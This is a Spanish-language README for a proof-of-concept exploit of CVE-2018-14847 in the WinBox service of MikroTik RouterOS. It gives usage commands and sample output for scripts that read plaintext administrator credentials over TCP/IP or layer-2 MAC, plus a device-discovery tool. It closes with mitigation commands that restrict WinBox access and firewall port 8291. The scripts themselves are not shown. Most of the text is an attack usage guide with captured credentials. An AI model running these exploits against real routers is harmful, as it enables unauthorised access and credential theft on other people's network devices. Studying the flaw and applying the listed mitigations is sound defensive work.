
Exploit de prueba de concepto para CVE-2018-14847 que permite la lectura arbitraria de archivos de contraseñas en texto plano del servicio WinBox de MikroTik RouterOS, con soporte para servidores TCP/IP y MAC de capa 2.
Esta es una prueba de concepto de la vulnerabilidad crítica de WinBox (CVE-2018-14847) que permite la lectura arbitraria de archivos de contraseñas en texto plano.
https://n0p.me/winbox-bug-dissection/
Este script NO se ejecutará con Python 2.x o inferior.
El script se utiliza de forma sencilla con argumentos simples en la línea de comandos.
Explotar la vulnerabilidad y leer la contraseña.
python3 WinboxExploit.py <IP-ADDRESS> [PORT]
Ejemplo:
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord


Puede extraer archivos incluso si el dispositivo no tiene dirección IP.
Verificación de descubrimiento simple para dispositivos Mikrotik conectados localmente.
python3 MACServerDiscover.py
Ejemplo:
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)
aa:bb:cc:dd:ee:ff
aa:bb:cc:dd:ee:aa
Explotar la vulnerabilidad y leer la contraseña.
python3 MACServerExploit.py <MAC-ADDRESS>
Ejemplo:
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff
User: admin
Pass: Th3P4ssWord
Todas las versiones de RouterOS desde 2015-05-28 hasta 2018-04-20 son vulnerables a este exploit.
Dispositivos Mikrotik que ejecutan versiones de RouterOS:
Para más información ver: https://blog.mikrotik.com/security/winbox-vulnerability.html
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
/tool mac-server mac-winbox